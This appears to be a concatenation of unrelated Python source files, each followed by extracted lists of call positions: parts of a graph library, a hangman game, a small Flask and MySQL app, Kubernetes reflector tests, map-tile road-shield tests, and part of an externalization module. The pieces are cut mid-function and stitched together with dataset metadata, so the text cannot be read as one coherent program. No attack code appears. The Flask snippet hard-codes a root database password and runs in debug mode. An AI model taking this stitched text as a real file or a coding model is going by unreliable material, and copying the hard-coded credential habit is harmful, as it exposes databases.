>>> names = 'e f g h'.split()
>>> _bind_where_int_keys_repl_with_argname(bind, names)
{'e': 'a', 'f': 'b', 'c': 'x', 'd': 'y'}
"""
def transformed_items():
for k, v in bind.items():
if isinstance(k, int):
argname = names[k]
yield argname, v
else:
yield k, v
return dict(transformed_items())
def _complete_dict_with_iterable_of_required_keys(
to_complete: dict, complete_with: Iterable
):
"""Complete `to_complete` (in place) with `complete_with`
`complete_with` contains values that must be covered by `to_complete`
Those values that are not covered will be inserted in to_complete,
with key=val
>>> d = {'a': 'A', 'c': 'C'}
>>> _complete_dict_with_iterable_of_required_keys(d, 'abc')
>>> d
{'a': 'A', 'c': 'C', 'b': 'b'}
"""
keys_already_covered = set(to_complete)
for required_key in complete_with:
if required_key not in keys_already_covered:
to_complete[required_key] = required_key
| [
"i2.Sig",
"meshed.util.mk_func_name",
"i2.call_somewhat_forgivingly",
"collections.Counter",
"meshed.util.NameValidationError",
"functools.partial",
"meshed.itools.add_edge",
"meshed.util.ValidationError",
"dataclasses.field"
] | [((7642, 7661), 'dataclasses.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (7647, 7661), False, 'from dataclasses import dataclass, field\n'), ((7679, 7706), 'dataclasses.field', 'field', ([], {'default_factory': 'dict'}), '(default_factory=dict)\n', (7684, 7706), False, 'from dataclasses import dataclass, field\n'), ((7722, 7741), 'dataclasses.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (7727, 7741), False, 'from dataclasses import dataclass, field\n'), ((7764, 7783), 'dataclasses.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (7769, 7783), False, 'from dataclasses import dataclass, field\n'), ((17615, 17632), 'collections.Counter', 'Counter', (['elements'], {}), '(elements)\n', (17622, 17632), False, 'from collections import Counter\n'), ((1093, 1111), 'meshed.util.mk_func_name', 'mk_func_name', (['func'], {}), '(func)\n', (1105, 1111), False, 'from meshed.util import ValidationError, NameValidationError, mk_func_name\n'), ((2677, 2744), 'meshed.util.ValidationError', 'ValidationError', (['f"""Should be strings: {names_that_are_not_strings}"""'], {}), "(f'Should be strings: {names_that_are_not_strings}')\n", (2692, 2744), False, 'from meshed.util import ValidationError, NameValidationError, mk_func_name\n'), ((2859, 2925), 'meshed.util.ValidationError', 'ValidationError', (['f"""{func_node} has duplicate names: {_duplicates}"""'], {}), "(f'{func_node} has duplicate names: {_duplicates}')\n", (2874, 2925), False, 'from meshed.util import ValidationError, NameValidationError, mk_func_name\n'), ((3126, 3198), 'meshed.util.ValidationError', 'ValidationError', (['f"""{func_node} non-identifier names: {_non_identifiers}"""'], {}), "(f'{func_node} non-identifier names: {_non_identifiers}')\n", (3141, 3198), False, 'from meshed.util import ValidationError, NameValidationError, mk_func_name\n'), ((8392, 8406), 'i2.Sig', 'Sig', (['self.func'], {}), '(self.func)\n', (8395, 8406), False, 'from i2 import Sig, 
call_somewhat_forgivingly\n'), ((8777, 8826), 'functools.partial', 'partial', (['_mapped_extraction'], {'to_extract': 'self.bind'}), '(_mapped_extraction, to_extract=self.bind)\n', (8784, 8826), False, 'from functools import partial\n'), ((9674, 9746), 'i2.call_somewhat_forgivingly', 'call_somewhat_forgivingly', (['self.func', 'args', 'kwargs'], {'enforce_sig': 'self.sig'}), '(self.func, args, kwargs, enforce_sig=self.sig)\n', (9699, 9746), False, 'from i2 import Sig, call_somewhat_forgivingly\n'), ((11757, 11783), 'collections.Counter', 'Counter', (['(node_names + outs)'], {}), '(node_names + outs)\n', (11764, 11783), False, 'from collections import Counter\n'), ((12609, 12630), 'meshed.itools.add_edge', 'add_edge', (['g', 'f', 'f.out'], {}), '(g, f, f.out)\n', (12617, 12630), False, 'from meshed.itools import add_edge\n'), ((15636, 15682), 'meshed.util.ValidationError', 'ValidationError', (['f"""Should be callable: {func}"""'], {}), "(f'Should be callable: {func}')\n", (15651, 15682), False, 'from meshed.util import ValidationError, NameValidationError, mk_func_name\n'), ((15752, 15795), 'meshed.util.ValidationError', 'ValidationError', (['f"""Should be a str: {name}"""'], {}), "(f'Should be a str: {name}')\n", (15767, 15795), False, 'from meshed.util import ValidationError, NameValidationError, mk_func_name\n'), ((16044, 16086), 'meshed.util.ValidationError', 'ValidationError', (['f"""Should be a str: {out}"""'], {}), "(f'Should be a str: {out}')\n", (16059, 16086), False, 'from meshed.util import ValidationError, NameValidationError, mk_func_name\n'), ((1386, 1414), 'meshed.util.NameValidationError', 'NameValidationError', (['err_msg'], {}), '(err_msg)\n', (1405, 1414), False, 'from meshed.util import ValidationError, NameValidationError, mk_func_name\n'), ((12576, 12600), 'meshed.itools.add_edge', 'add_edge', (['g', 'src_name', 'f'], {}), '(g, src_name, f)\n', (12584, 12600), False, 'from meshed.itools import add_edge\n'), ((14991, 15031), 
'meshed.util.ValidationError', 'ValidationError', (['f"""Should be a str: {k}"""'], {}), "(f'Should be a str: {k}')\n", (15006, 15031), False, 'from meshed.util import ValidationError, NameValidationError, mk_func_name\n'), ((15085, 15125), 'meshed.util.ValidationError', 'ValidationError', (['f"""Should be a str: {v}"""'], {}), "(f'Should be a str: {v}')\n", (15100, 15125), False, 'from meshed.util import ValidationError, NameValidationError, mk_func_name\n'), ((15878, 15922), 'meshed.util.ValidationError', 'ValidationError', (['f"""Should be a dict: {bind}"""'], {}), "(f'Should be a dict: {bind}')\n", (15893, 15922), False, 'from meshed.util import ValidationError, NameValidationError, mk_func_name\n')] |
#!/usr/bin/env python3
"""Hangman game"""
import argparse
import io
import random
import re
import sys
# --------------------------------------------------
def get_args():
    """Parse and validate the command-line arguments."""
    parser = argparse.ArgumentParser(
        description='Hangman',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    # (flag, long flag, help, type, default) for the simple scalar options.
    parser.add_argument('-l', '--maxlen', help='Max word length',
                        type=int, default=10)
    parser.add_argument('-n', '--minlen', help='Min word length',
                        type=int, default=5)
    parser.add_argument('-m', '--misses', help='Max number of misses',
                        type=int, default=10)
    parser.add_argument('-s', '--seed', help='Random seed',
                        type=str, default=None)
    parser.add_argument('-w', '--wordlist', help='Word list',
                        type=argparse.FileType('r'),
                        default='/usr/share/dict/words')
    parser.add_argument('-i', '--inputs', help='Input choices',
                        type=str, default='')
    args = parser.parse_args()
    # Cross-field validation; parser.error() prints usage and exits.
    if args.minlen < 1:
        parser.error('--minlen "{}" must be positive'.format(args.minlen))
    if args.maxlen > 20:
        parser.error('--maxlen "{}" must be < 20'.format(args.maxlen))
    if args.minlen > args.maxlen:
        parser.error('--minlen "{}" is greater than --maxlen "{}"'.format(
            args.minlen, args.maxlen))
    return args
# --------------------------------------------------
def get_words(wordlist, min_len, max_len):
    """Read wordlist (file handle), return words in range(min_len, max_len).

    Words are lowercased; only words made entirely of the letters a-z whose
    length is between ``min_len`` and ``max_len`` (both inclusive) are kept.
    """
    # Compile the pattern once instead of re-matching a raw string per word;
    # fullmatch makes the previous ^...$ anchors unnecessary.
    pattern = re.compile(f'[a-z]{{{min_len},{max_len}}}')
    return [w for w in wordlist.read().lower().split() if pattern.fullmatch(w)]
# --------------------------------------------------
def main():
    """Entry point: parse args, pick a word, and run the game loop."""
    args = get_args()
    words = get_words(args.wordlist, args.minlen, args.maxlen)
    # Seeding with a fixed value makes the chosen word reproducible (tests).
    random.seed(args.seed)
    initial_state = {
        'word': random.choice(words),
        'max_misses': args.misses,
        'inputs': list(args.inputs),
    }
    won = play(initial_state)
    print('You win!' if won else 'You lose, loser!')
# --------------------------------------------------
def play(state):
    """Play a round given a `dict` of the current state of the game"""
    word = state.get('word')
    if not word:
        print('No word!')
        return False
    guessed = state.get('guessed', list('_' * len(word)))
    prev_guesses = state.get('prev_guesses', set())
    num_misses = state.get('num_misses', 0)
    max_misses = state.get('max_misses', 10)
    inputs = state.get('inputs', [])
    # Terminal checks come first so a finished game never prompts again.
    if ''.join(guessed) == word:
        suffix = '' if num_misses == 1 else 'es'
        print('You guessed "{}" with "{}" miss{}.'.format(word, num_misses, suffix))
        return True
    if num_misses >= max_misses:
        print('The word was "{}."'.format(word))
        return False
    print('{} (Misses: {})'.format(' '.join(guessed), num_misses))
    # Scripted inputs (for testing) take priority over the interactive prompt.
    if inputs:
        new_guess = inputs.pop(0)
    else:
        new_guess = input('Your guess? ("?" for hint, "!" to quit) ').lower()
    if new_guess == '!':
        print('Better luck next time.')
        return False
    if new_guess == '?':
        # A hint reveals a random unguessed letter, at the cost of one miss.
        new_guess = random.choice([c for c in word if c not in guessed])
        num_misses += 1
    if not re.match('^[a-z]$', new_guess):
        print('"{}" is not a letter.'.format(new_guess))
        num_misses += 1
    elif new_guess in prev_guesses:
        print('You already guessed that.')
    elif new_guess in word:
        prev_guesses.add(new_guess)
        # Reveal every occurrence of the guessed letter.
        search_from = 0
        while True:
            pos = word.find(new_guess, search_from)
            if pos < 0:
                break
            guessed[pos] = new_guess
            search_from = pos + 1
    else:
        print('There is no "{}."'.format(new_guess))
        num_misses += 1
    # Tail-recurse with the updated state.
    return play({
        'word': word,
        'guessed': guessed,
        'num_misses': num_misses,
        'prev_guesses': prev_guesses,
        'max_misses': max_misses,
        'inputs': inputs,
    })
# --------------------------------------------------
if __name__ == '__main__':
main()
| [
"argparse.FileType",
"random.choice",
"argparse.ArgumentParser",
"re.match",
"random.seed"
] | [((215, 322), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Hangman"""', 'formatter_class': 'argparse.ArgumentDefaultsHelpFormatter'}), "(description='Hangman', formatter_class=argparse.\n ArgumentDefaultsHelpFormatter)\n", (238, 322), False, 'import argparse\n'), ((2396, 2418), 'random.seed', 'random.seed', (['args.seed'], {}), '(args.seed)\n', (2407, 2418), False, 'import random\n'), ((2140, 2157), 're.match', 're.match', (['good', 'w'], {}), '(good, w)\n', (2148, 2157), False, 'import re\n'), ((3807, 3837), 're.match', 're.match', (['"""^[a-z]$"""', 'new_guess'], {}), "('^[a-z]$', new_guess)\n", (3815, 3837), False, 'import re\n'), ((1215, 1237), 'argparse.FileType', 'argparse.FileType', (['"""r"""'], {}), "('r')\n", (1232, 1237), False, 'import argparse\n'), ((2455, 2475), 'random.choice', 'random.choice', (['words'], {}), '(words)\n', (2468, 2475), False, 'import random\n'), ((3718, 3770), 'random.choice', 'random.choice', (['[c for c in word if c not in guessed]'], {}), '([c for c in word if c not in guessed])\n', (3731, 3770), False, 'import random\n')] |
from flask import Flask, request, jsonify
from sqlalchemy import create_engine
app = Flask(__name__)  # WSGI application instance
# NOTE(review): credentials are hard-coded in the URL ("root:admin") -- consider
# reading them from the environment. Host "db" presumably resolves inside a
# container network; verify against the deployment config.
engine = create_engine("mysql+pymysql://root:admin@db:3306/mydb")
@app.route("/members", methods=["POST"])
def members():
    """Insert a member from the POSTed JSON body and echo it back with its id."""
    payload = request.json
    with engine.connect() as conn:
        # Parameterized insert (driver-level %s placeholder), then read the row back.
        conn.execute("INSERT INTO members (name) VALUES (%s)", payload["name"])
        rows = list(
            conn.execute("SELECT * FROM members WHERE id=LAST_INSERT_ID()")
        )
        created = rows[0]
    return jsonify({"id": created.id, "name": created.name})
if __name__ == "__main__":
    # Development server entry point; debug=True must not be used in production.
    app.run(debug=True, host="0.0.0.0", port=8080)
| [
"flask.jsonify",
"sqlalchemy.create_engine",
"flask.Flask"
] | [((87, 102), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (92, 102), False, 'from flask import Flask, request, jsonify\n'), ((112, 168), 'sqlalchemy.create_engine', 'create_engine', (['"""mysql+pymysql://root:admin@db:3306/mydb"""'], {}), "('mysql+pymysql://root:admin@db:3306/mydb')\n", (125, 168), False, 'from sqlalchemy import create_engine\n'), ((504, 545), 'flask.jsonify', 'jsonify', (["{'id': row.id, 'name': row.name}"], {}), "({'id': row.id, 'name': row.name})\n", (511, 545), False, 'from flask import Flask, request, jsonify\n')] |
# -*- encoding: utf-8 -*-
from . import FixtureTest
class AustraliaShieldTextPrefixesTest(FixtureTest):
    """Check that Australian route relations produce the letter-prefixed
    shield_text (M1, A36, ...) and the matching AU network value."""
    def test_m(self):
        # M-road: motorway relation ref 'M1' -> network 'AU:M-road'.
        import dsl
        z, x, y = (16, 60295, 39334)
        self.generate_fixtures(
            dsl.is_in('AU', z, x, y),
            # https://www.openstreetmap.org/way/170318728
            dsl.way(170318728, dsl.tile_diagonal(z, x, y), {
                'bicycle': u'no',
                'highway': u'motorway',
                'lanes': u'2',
                'layer': u'-1',
                'maxspeed': u'80',
                'name': u'Eastern Distributor',
                'old_network': u'MR',
                'old_ref': u'1',
                'oneway': u'yes',
                'ref': u'M1',
                'ref:start_date': u'2013-08',
                'source': u'openstreetmap.org',
                'surface': u'asphalt',
                'toll': u'yes',
            }),
            dsl.relation(1, {
                'addr:country': u'AU',
                'addr:state': u'NSW',
                'ref': u'M1',
                'route': u'road',
                'source': u'openstreetmap.org',
                'type': u'route',
            }, ways=[170318728]),
        )
        self.assert_has_feature(
            z, x, y, 'roads', {
                'id': 170318728,
                'shield_text': 'M1',
                'network': 'AU:M-road',
            })
    def test_a(self):
        # A-road: trunk relation ref 'A36' -> network 'AU:A-road'.
        import dsl
        z, x, y = (16, 60290, 39332)
        self.generate_fixtures(
            dsl.is_in('AU', z, x, y),
            # https://www.openstreetmap.org/way/286361145
            dsl.way(286361145, dsl.tile_diagonal(z, x, y), {
                'highway': u'trunk',
                'lanes': u'4',
                'lit': u'yes',
                'maxspeed': u'50',
                'name': u'<NAME>',
                'parking:lane:both:parallel': u'on_street',
                'parking:lane:both:width': u'2',
                'ref': u'A36',
                'ref:start_date': u'2013-06',
                'sidewalk': u'both',
                'smoothness:lanes': u'|||intermediate',
                'source': u'openstreetmap.org',
                'surface': u'paved',
                'width': u'13.7',
            }),
            dsl.relation(1, {
                'addr:country': u'AU',
                'addr:state': u'NSW',
                'ref': u'A36',
                'ref:start_date': u'2013-06',
                'route': u'road',
                'source': u'openstreetmap.org',
                'type': u'route',
            }, ways=[286361145]),
        )
        self.assert_has_feature(
            z, x, y, 'roads', {
                'id': 286361145,
                'shield_text': 'A36',
                'network': 'AU:A-road',
            })
| [
"dsl.tile_diagonal",
"dsl.is_in",
"dsl.relation"
] | [((231, 255), 'dsl.is_in', 'dsl.is_in', (['"""AU"""', 'z', 'x', 'y'], {}), "('AU', z, x, y)\n", (240, 255), False, 'import dsl\n'), ((924, 1094), 'dsl.relation', 'dsl.relation', (['(1)', "{'addr:country': u'AU', 'addr:state': u'NSW', 'ref': u'M1', 'route':\n u'road', 'source': u'openstreetmap.org', 'type': u'route'}"], {'ways': '[170318728]'}), "(1, {'addr:country': u'AU', 'addr:state': u'NSW', 'ref': u'M1',\n 'route': u'road', 'source': u'openstreetmap.org', 'type': u'route'},\n ways=[170318728])\n", (936, 1094), False, 'import dsl\n'), ((1525, 1549), 'dsl.is_in', 'dsl.is_in', (['"""AU"""', 'z', 'x', 'y'], {}), "('AU', z, x, y)\n", (1534, 1549), False, 'import dsl\n'), ((2265, 2466), 'dsl.relation', 'dsl.relation', (['(1)', "{'addr:country': u'AU', 'addr:state': u'NSW', 'ref': u'A36',\n 'ref:start_date': u'2013-06', 'route': u'road', 'source':\n u'openstreetmap.org', 'type': u'route'}"], {'ways': '[286361145]'}), "(1, {'addr:country': u'AU', 'addr:state': u'NSW', 'ref': u'A36',\n 'ref:start_date': u'2013-06', 'route': u'road', 'source':\n u'openstreetmap.org', 'type': u'route'}, ways=[286361145])\n", (2277, 2466), False, 'import dsl\n'), ((346, 372), 'dsl.tile_diagonal', 'dsl.tile_diagonal', (['z', 'x', 'y'], {}), '(z, x, y)\n', (363, 372), False, 'import dsl\n'), ((1640, 1666), 'dsl.tile_diagonal', 'dsl.tile_diagonal', (['z', 'x', 'y'], {}), '(z, x, y)\n', (1657, 1666), False, 'import dsl\n')] |
from kubernetes_informers import Reflector, CoalescingQueue
from kubernetes_informers.reflector import Delta
import asyncio
import pytest
from kubernetes_asyncio import client
def make_pod(ns, name, rv):
    """Build a minimal V1Pod carrying only the metadata the reflector compares."""
    metadata = client.V1ObjectMeta(namespace=ns, resource_version=rv, name=name)
    return client.V1Pod(metadata=metadata)
@pytest.mark.asyncio
async def test_single_changes():
    """
    Validate deltas with single object changes only
    """
    # Successive snapshots the fake list() call will return, one per resync.
    states = [
        # Initial state is empty
        [],
        # Add pod1
        [make_pod('ns', 'pod1', 1) ],
        # Add pod2
        [
            make_pod('ns', 'pod1', 1),
            make_pod('ns', 'pod2', 1)
        ],
        # Change pod1
        [
            make_pod('ns', 'pod1', 2),
            make_pod('ns', 'pod2', 1)
        ],
        # Delete pod1
        [
            make_pod('ns', 'pod2', 1)
        ],
        # Change pod2
        [
            make_pod('ns', 'pod2', 2)
        ],
        # Delete pod2
        [],
    ]
    # Exactly one delta expected per state transition, in order.
    deltas = [
        Delta(type='added', resource=make_pod('ns', 'pod1', 1)),
        Delta(type='added', resource=make_pod('ns', 'pod2', 1)),
        Delta(type='changed', resource=make_pod('ns', 'pod1', 2)),
        Delta(type='deleted', resource=make_pod('ns', 'pod1', 2)),
        Delta(type='changed', resource=make_pod('ns', 'pod2', 2)),
        Delta(type='deleted', resource=make_pod('ns', 'pod2', 2)),
    ]
    yield_states = iter(states)
    # Stand-in for the kubernetes list API: returns the next snapshot per call.
    async def fake_list_method(namespace, *args, **kwargs):
        assert namespace == 'ns'
        state = next(yield_states)
        return client.V1PodList(items=state)
    q = CoalescingQueue()
    # Short resync period keeps the test fast.
    r = Reflector(q, fake_list_method, 'ns', resync_period=0.1)
    reflect_future = asyncio.ensure_future(r.reflect())
    for expected_delta in deltas:
        delta = await q.get()
        assert delta == expected_delta
    reflect_future.cancel()
@pytest.mark.asyncio
async def test_multiple_changes():
    """
    Validate deltas when several objects change between consecutive snapshots
    """
    # Successive snapshots the fake list() call will return, one per resync.
    states = [
        # Initial state is empty
        [],
        # Add two pods
        [
            make_pod('ns', 'pod1', 1),
            make_pod('ns', 'pod2', 1)
        ],
        # Change pod1
        [
            make_pod('ns', 'pod1', 2),
            make_pod('ns', 'pod2', 1)
        ],
        # Delete pod1
        [
            make_pod('ns', 'pod2', 1)
        ],
        # Change pod2
        [
            make_pod('ns', 'pod2', 2)
        ],
        # Add pod3 and pod4
        [
            make_pod('ns', 'pod2', 2),
            make_pod('ns', 'pod3', 1),
            make_pod('ns', 'pod4', 1),
        ],
        # Change pod3 and pod4
        [
            make_pod('ns', 'pod2', 2),
            make_pod('ns', 'pod3', 2),
            make_pod('ns', 'pod4', 2),
        ],
        # Delete all pods
        [],
    ]
    # One batch per state transition; deltas within a batch may arrive in any
    # order, hence the membership check (not equality) below.
    delta_batches = [
        [
            Delta(type='added', resource=make_pod('ns', 'pod1', 1)),
            Delta(type='added', resource=make_pod('ns', 'pod2', 1)),
        ],
        [
            Delta(type='changed', resource=make_pod('ns', 'pod1', 2)),
        ],
        [
            Delta(type='deleted', resource=make_pod('ns', 'pod1', 2)),
        ],
        [
            Delta(type='changed', resource=make_pod('ns', 'pod2', 2)),
        ],
        [
            Delta(type='added', resource=make_pod('ns', 'pod3', 1)),
            Delta(type='added', resource=make_pod('ns', 'pod4', 1)),
        ],
        [
            Delta(type='changed', resource=make_pod('ns', 'pod3', 2)),
            Delta(type='changed', resource=make_pod('ns', 'pod4', 2)),
        ],
        [
            Delta(type='deleted', resource=make_pod('ns', 'pod2', 2)),
            Delta(type='deleted', resource=make_pod('ns', 'pod3', 2)),
            Delta(type='deleted', resource=make_pod('ns', 'pod4', 2)),
        ]
    ]
    yield_states = iter(states)
    # Stand-in for the kubernetes list API: returns the next snapshot per call.
    async def fake_list_method(namespace, *args, **kwargs):
        assert namespace == 'ns'
        state = next(yield_states)
        return client.V1PodList(items=state)
    q = CoalescingQueue()
    # Short resync period keeps the test fast.
    r = Reflector(q, fake_list_method, 'ns', resync_period=0.1)
    reflect_future = asyncio.ensure_future(r.reflect())
    for delta_batch in delta_batches:
        while len(delta_batch) != 0:
            delta = await q.get()
            assert delta in delta_batch
            delta_batch.remove(delta)
    reflect_future.cancel()
| [
"kubernetes_informers.Reflector",
"kubernetes_informers.CoalescingQueue",
"kubernetes_asyncio.client.V1ObjectMeta",
"kubernetes_asyncio.client.V1PodList"
] | [((1635, 1652), 'kubernetes_informers.CoalescingQueue', 'CoalescingQueue', ([], {}), '()\n', (1650, 1652), False, 'from kubernetes_informers import Reflector, CoalescingQueue\n'), ((1661, 1716), 'kubernetes_informers.Reflector', 'Reflector', (['q', 'fake_list_method', '"""ns"""'], {'resync_period': '(0.1)'}), "(q, fake_list_method, 'ns', resync_period=0.1)\n", (1670, 1716), False, 'from kubernetes_informers import Reflector, CoalescingQueue\n'), ((4110, 4127), 'kubernetes_informers.CoalescingQueue', 'CoalescingQueue', ([], {}), '()\n', (4125, 4127), False, 'from kubernetes_informers import Reflector, CoalescingQueue\n'), ((4136, 4191), 'kubernetes_informers.Reflector', 'Reflector', (['q', 'fake_list_method', '"""ns"""'], {'resync_period': '(0.1)'}), "(q, fake_list_method, 'ns', resync_period=0.1)\n", (4145, 4191), False, 'from kubernetes_informers import Reflector, CoalescingQueue\n'), ((1596, 1625), 'kubernetes_asyncio.client.V1PodList', 'client.V1PodList', ([], {'items': 'state'}), '(items=state)\n', (1612, 1625), False, 'from kubernetes_asyncio import client\n'), ((4071, 4100), 'kubernetes_asyncio.client.V1PodList', 'client.V1PodList', ([], {'items': 'state'}), '(items=state)\n', (4087, 4100), False, 'from kubernetes_asyncio import client\n'), ((247, 312), 'kubernetes_asyncio.client.V1ObjectMeta', 'client.V1ObjectMeta', ([], {'namespace': 'ns', 'resource_version': 'rv', 'name': 'name'}), '(namespace=ns, resource_version=rv, name=name)\n', (266, 312), False, 'from kubernetes_asyncio import client\n')] |
# cython: auto_pickle=False,embedsignature=True,always_allow_keywords=False
# -*- coding: utf-8 -*
"""
Datastructures to help externalization.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# There are a *lot* of fixme (XXX and the like) in this file.
# Turn those off in general so we can see through the noise.
# pylint:disable=fixme
# pylint:disable=keyword-arg-before-vararg
# stdlib imports
import numbers
import warnings
import six
from six import iteritems
from zope import interface
from zope import schema
from zope.component import getUtility
from zope.schema.interfaces import SchemaNotProvided
from zope.schema.interfaces import IDict
from zope.schema.interfaces import IObject
from nti.schema.interfaces import find_most_derived_interface
from .interfaces import IInternalObjectExternalizer
from .interfaces import IInternalObjectIO
from .interfaces import IInternalObjectIOFinder
from .interfaces import IAnonymousObjectFactory
from .interfaces import StandardInternalFields
# Things imported from cython with matching cimport
from .externalization.dictionary import to_minimal_standard_external_dictionary
from .externalization.dictionary import internal_to_standard_external_dictionary
# Must rename this so it doesn't conflict with method defs;
# that breaks cython
from .externalization.externalizer import to_external_object as _toExternalObject
from .internalization import validate_named_field_value
from .internalization.factories import find_factory_for
from .representation import make_repr
from .factory import AnonymousObjectFactory
from ._base_interfaces import get_standard_external_fields
from ._base_interfaces import get_standard_internal_fields
from ._base_interfaces import get_default_externalization_policy
from ._base_interfaces import NotGiven
from ._interface_cache import cache_for
StandardExternalFields = get_standard_external_fields()
StandardInternalFields = get_standard_internal_fields()
DEFAULT_EXTERNALIZATION_POLICY = get_default_externalization_policy()
IDict_providedBy = IDict.providedBy
IObject_providedBy = IObject.providedBy
__all__ = [
'ExternalizableDictionaryMixin',
'StandardInternalObjectExternalizer',
'AbstractDynamicObjectIO',
'ExternalizableInstanceDict',
'InterfaceObjectIO',
'ModuleScopedInterfaceObjectIO',
]
class ExternalizableDictionaryMixin(object):
    """
    Mixin that supplies :meth:`toExternalDictionary`, producing the
    standard external dictionary for :meth:`_ext_replacement`.
    """
    #: When true, ask for the *minimal* standard dictionary instead of
    #: the full one. See :func:`~to_minimal_standard_external_dictionary`
    __external_use_minimal_base__ = False

    def _ext_replacement(self):
        """
        The object actually being externalized.
        This base implementation returns ``self``; subclasses commonly
        substitute a different object.
        """
        return self

    def _ext_standard_external_dictionary(self, replacement, mergeFrom=None, **kwargs):
        if self.__external_use_minimal_base__:
            return to_minimal_standard_external_dictionary(replacement,
                                                           mergeFrom=mergeFrom)
        # Pull the recognized options out of kwargs, falling back to the
        # usual defaults, then delegate to the full implementation.
        decorate = kwargs.get('decorate', True)
        request = kwargs.get('request', NotGiven)
        decorate_callback = kwargs.get('decorate_callback', NotGiven)
        policy = kwargs.get("policy", DEFAULT_EXTERNALIZATION_POLICY)
        return internal_to_standard_external_dictionary(
            replacement,
            mergeFrom=mergeFrom,
            decorate=decorate,
            request=request,
            decorate_callback=decorate_callback,
            policy=policy,
        )

    def toExternalDictionary(self, mergeFrom=None, *unused_args, **kwargs):
        """
        Produce the standard external dictionary for this object.
        Uses `_ext_replacement`.
        """
        replacement = self._ext_replacement()
        return self._ext_standard_external_dictionary(replacement,
                                                      mergeFrom=mergeFrom,
                                                      **kwargs)
class StandardInternalObjectExternalizer(ExternalizableDictionaryMixin):
    """
    Adapter implementing
    :class:`~nti.externalization.interfaces.IInternalObjectExternalizer`
    by producing the standard external dictionary for its *context*.
    Register it as-is, or subclass it to contribute extra items: call
    this implementation first, then update the dictionary it returns.
    .. versionadded:: 2.3.0
    """
    def __init__(self, context):
        """
        Store *context* and initialize the externalizer flags:
        ``__external_can_create__`` is always `False` (creating from
        just an externalizer makes no sense), and
        ``__external_class_name__`` starts as `None` (when a subclass
        assigns a value here it replaces the ``Class`` entry of the
        returned dictionary; it *must* be a native `str`).
        """
        self.context = context
        self.__external_can_create__ = False
        self.__external_class_name__ = None
    def _ext_replacement(self):
        """
        Externalize the adapted *context*, not the adapter itself.
        """
        return self.context
    def toExternalObject(self, **kwargs):
        external = self.toExternalDictionary(**kwargs)
        override = self.__external_class_name__
        if override:
            external[StandardExternalFields.CLASS] = override
        return external
# Declare (post hoc, without subclassing or a class decorator) that the
# adapter provides the externalizer interface.
interface.classImplements(StandardInternalObjectExternalizer,
                          IInternalObjectExternalizer)
class AbstractDynamicObjectIO(ExternalizableDictionaryMixin):
    """
    Base class for objects that externalize based on dynamic information.
    Abstractions are in place to allow subclasses to map external and internal names
    independently (this type never uses getattr/setattr/hasattr, except for some
    standard fields).
    See `InterfaceObjectIO` for a complete implementation.
    """
    # TODO: there should be some better way to customize this if desired (an explicit list)
    # TODO: Play well with __slots__
    # TODO: This won't evolve well. Need something more sophisticated,
    # probably a meta class.
    # Avoid things super handles
    # These all *should* be frozenset() and immutable
    #: Names never copied *out* to the external dictionary by this class;
    #: the standard-dictionary machinery in the superclass handles them.
    _excluded_out_ivars_ = frozenset({
        StandardInternalFields.ID,
        StandardExternalFields.ID,
        StandardInternalFields.CREATOR,
        StandardExternalFields.CREATOR,
        StandardInternalFields.CONTAINER_ID,
        'lastModified',
        StandardInternalFields.LAST_MODIFIEDU,
        StandardInternalFields.CREATED_TIME,
        'links'
    })
    #: External keys silently ignored when updating *from* external data
    #: (identity/provenance fields; see ``_ext_accept_update_key``).
    _excluded_in_ivars_ = frozenset({
        StandardInternalFields.ID,
        StandardExternalFields.ID,
        StandardExternalFields.OID,
        StandardInternalFields.CREATOR,
        StandardExternalFields.CREATOR,
        StandardInternalFields.LAST_MODIFIED,
        StandardInternalFields.LAST_MODIFIEDU,
        # Also the IDCTimes created/modified values
        'created', 'modified',
        StandardExternalFields.CLASS,
        StandardInternalFields.CONTAINER_ID
    })
    #: Keys whose values are known primitive, letting externalization
    #: skip the recursive ``toExternalObject`` call for them.
    _ext_primitive_out_ivars_ = frozenset()
    #: When true and both ``ID`` and ``OID`` are produced, ``OID`` wins.
    _prefer_oid_ = False
    def find_factory_for_named_value(self, key, value): # pylint:disable=unused-argument
        """
        Uses `.find_factory_for` to locate a factory.
        This does not take into account the current object (context)
        or the *key*. It only handles finding factories based on the
        class or MIME type found within *value*.
        """
        return find_factory_for(value)
    def _ext_replacement(self):
        """Return the object being externalized; here, ``self``."""
        # Redeclare this here for cython
        return self
    def _ext_all_possible_keys(self):
        """
        This method must return a `frozenset` of native strings.
        """
        raise NotImplementedError()
    def _ext_setattr(self, ext_self, k, value):
        # Abstract hook: store *value* on *ext_self* under the internal
        # name *k*. Subclasses decide how (plain setattr, schema
        # validation, ...).
        raise NotImplementedError()
    def _ext_getattr(self, ext_self, k, default=NotGiven):
        """
        _ext_getattr(object, name[, default]) -> value
        Return the attribute of the *ext_self* object with the internal name *name*.
        If the attribute does not exist, should raise (typically :exc:`AttributeError`),
        unless *default* is given, in which case it returns that.
        .. versionchanged:: 1.0a4
           Add the *default* argument.
        """
        raise NotImplementedError()
    def _ext_replacement_getattr(self, name, default=NotGiven):
        """
        Like `_ext_getattr`, but automatically fills in `_ext_replacement`
        for the *ext_self* argument.
        .. versionadded:: 1.0a4
        """
        return self._ext_getattr(self._ext_replacement(), name, default)
    def _ext_keys(self):
        """
        Return only the names of attributes that should be externalized.
        These values will be used as keys in the external dictionary.
        See :meth:`_ext_all_possible_keys`. This implementation then filters out
        *private* attributes (those beginning with an underscore),
        and those listed in ``_excluded_in_ivars_``.
        This method must return a set of native strings.
        """
        # NOTE(review): despite the docstring this returns a *list*;
        # callers here only iterate it, so that is harmless.
        # Sadly, we cannot yet enforce what type _excluded_out_ivars_ is.
        # Mostly it is a set or frozen set (depending on how it was
        # combined with the declaration in this class) but some overrides
        # in the wild have it as a tuple. We need a metaclass to fix that.
        excluded = self._excluded_out_ivars_
        return [k for k in self._ext_all_possible_keys()
                if (k not in excluded # specifically excluded
                    and not k.startswith('_'))] # private
        # and not callable(getattr(ext_self,k)))] # avoid functions
    def _ext_primitive_keys(self):
        """
        Return a container of string keys whose values are known to be primitive.
        This is an optimization for writing.
        This method must return a frozenset.
        """
        return self._ext_primitive_out_ivars_
    def toExternalDictionary(self, mergeFrom=None, *unused_args, **kwargs):
        """
        Build the standard external dictionary, then add every key from
